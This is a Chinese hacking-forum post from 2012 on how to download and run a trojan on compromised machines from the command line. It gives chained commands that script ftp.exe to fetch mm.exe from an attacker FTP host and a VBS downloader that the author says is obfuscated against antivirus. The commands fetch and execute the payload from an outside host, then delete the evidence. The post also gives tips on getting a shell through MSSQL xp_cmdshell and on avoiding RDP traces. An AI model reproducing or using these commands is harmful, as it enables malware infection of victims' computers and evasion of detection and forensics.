入侵之命令行下载、运行木马

显示全部楼层 · 2012-4-1 19:21:52

如何保持长久上线，防止动态ip或者域名变化导致找不到肉鸡。这需要种植木马，且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。如何下载木马并种植到肉鸡上面的问题，其实网上也有零散的，我这儿算是整理，同时加上自己的体会。大家还是多实践，多搞搞肉鸡（最好练习命令行，3389登陆上去一对记录，如被追踪很危险的。

其实我更相信，图形界面下能操作的，命令行都能操作正如windows下能搞的，linux下都能做到）这儿命令行可以是mssql1433得到的xp_cmdshell等。

木马下载无非是ftp跟http的网页下载两种方式，这儿分别介绍：

1.ftp下载

这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。

显然要解决输入帐号密码的问题，同时要制定命令让远程的ftp.exe执行，

从而下载文件。还好，这些都可以通过命令来解决。

假设木马文件在服务器ftpxx.3322.org下，帐号为ftpxx,密码为3322，文件为mm.exe。

通过命令行

===========================

echoftpxxx>ftp.txt

echo3322>>ftp.txt

echogetmm.exe>>ftp.txt

echobye>>ftp.txt

ftp-s:ftp.txtftpxx.3322.org

===========================

则根据前一篇文章的&用法，也可以用一句命令完成：

echoftpxxx>ftp.txt&echo3322>>ftp.txt&echogetmm.exe>>ftp.txt&echobye>>ftp.txt&ftp-s:ftp.txtftpxx.3322.org

这样就下载成功了。

下一步是执行木马并删除记录：

也就是一句话(三个语句）:

mm.exe&delftp.txt&delmm.exe
2.html下载

这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。
假设木马地址为:http://ftpxx.3322.org/mm.exemm.exe
通过命令行(无需任何修改，我已做免杀，除非被杀了，可以修改脚本）
＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

@echowithwscript:if.arguments.count^<2-0+0-0+0then.quit:endif>thisis.vbs

@echosetaso=.createobject("adodb.stream"):setthisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp")>>thisis.vbs

@echothisisweb.open"g"+"e"+"t",.arguments(0),0:thisisweb.send:ifthisisweb.status^>200then.echo"E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>>thisis.vbs

@echoaso.type=1-0+0-0+0:aso.open:aso.writethisisweb.responsebody:aso.savetofile.arguments(1-0+0-0+0),2-0+0-0+0:endwith>>thisis.vbs

Typethisis.vbs

＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝

下一步是执行木马并删除记录：

也就是一句话(三个语句）:

cscriptthisis.vbshttp://ftpxx.3322.org/mm.exemm.exe&delthisis.vbs&delmm.exe
或者简单的方法是(会弹出网页!):

STARTits:http://ftpxx.3322.org/mm.exe

下载后，

DIR/A/S"C:\DocumentsandSettings\DefaultUser\LocalSettings\TemporaryInternetFiles\Content.IE5\*.EXE"

列出路径后，执行。

这儿帐号DefaultUser也可能是当前用户
 

*